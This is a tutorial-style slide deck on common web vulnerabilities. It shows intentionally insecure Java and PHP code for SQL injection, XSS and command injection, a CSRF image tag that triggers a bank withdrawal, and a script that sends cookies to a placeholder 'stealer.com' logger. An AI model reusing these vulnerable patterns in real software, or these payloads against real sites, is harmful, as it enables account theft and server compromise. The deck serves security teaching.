Web Vulnerabilities for Pros!

Stuff we are gonna cover!

  1. SQLI
  2. XSS
  3. CSRF
  4. Remote Code execution
  5. Arbitrary file upload vulnerability
  6. Session stealing

Why?

Web applications are much easier to exploit than attacking the server directly...

 

 

Plus, we all know there are a lot of sucky devs out there we can rely upon.

SQLI

SQL Injection is a technique to insert malicious SQL into a poorly validated entry field.

 

Sony had this vulnerability.

//Make connection to DB
Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD);
String Username = request.getParameter("USER"); // From HTTP request
String Password = request.getParameter("PASSWORD"); // From HTTP request
int iUserID = -1;
String sLoggedUser = "";
String sel = "SELECT User_id, Username FROM USERS WHERE Username = '" +Username +  \
             "' AND Password = '" + Password + "'";

Statement selectStatement = connection.createStatement ();
ResultSet resultSet = selectStatement.executeQuery(sel);

if (resultSet.next()) {

       iUserID = resultSet.getInt(1);
       sLoggedUser = resultSet.getString(2);
}

XSS

Cross Site Scripting also known as XSS is a popular type of Client Site Attack. It allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

CIA had this vulnerability.

<html>
<body>
<p>Data Entered:</p>
<?php
if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}

echo "<i>$data</i>";

?>
</body>

CSRF

Fairly new. It is a type of exploit or website that sends unauthorized commands from a user to a websites that the user trusts.

<html>
<body>
<h1>Welcome to this page.</h1>
<img src="http://bank.example.com/withdraw?account=Alice&amount=1000000&for=Mallory">
</body>
</html>

How would you CSRF a post request?

Google was vulnerable to CSRF!

Remote Code Execution

Probably super lazy developers with very less knowledge about security introduced this bug.

 

If you try to use a system call somewhere in your webapp's code without properly sanitizing the input, you'll end up screwing yourself over. Isn't that f***ing obvious?

<html>
<body>
<p>File Contents:</p>
<?php
	echo "<pre>";
	system("cat " . $_GET['filename']);
	echo "<pre>";
?>
</body>

Arbitrary file upload vulnerability

 

Allowing uploading of files without checking their type or extension.

Finding such vulnerability in your webapp is "GGWP" for the hacker.

The hacker after finding this will upload a PHP shell and rip your server apart.

Anonymous, the hacking group's website, had this vulnerability.

Session stealing...

Its not a separate vulnerability but the use of persistent XSS to get something useful.

<script language="Java script">
document.location="http://www.stealer.com/cookielogger.php?cookie=" + document.cookie;
</script>

Hint:

Makes sense?

Web Vulnerabilities

By Aneesh Dogra

Made with Slides.com

Web Vulnerabilities

  • 661

More from Aneesh Dogra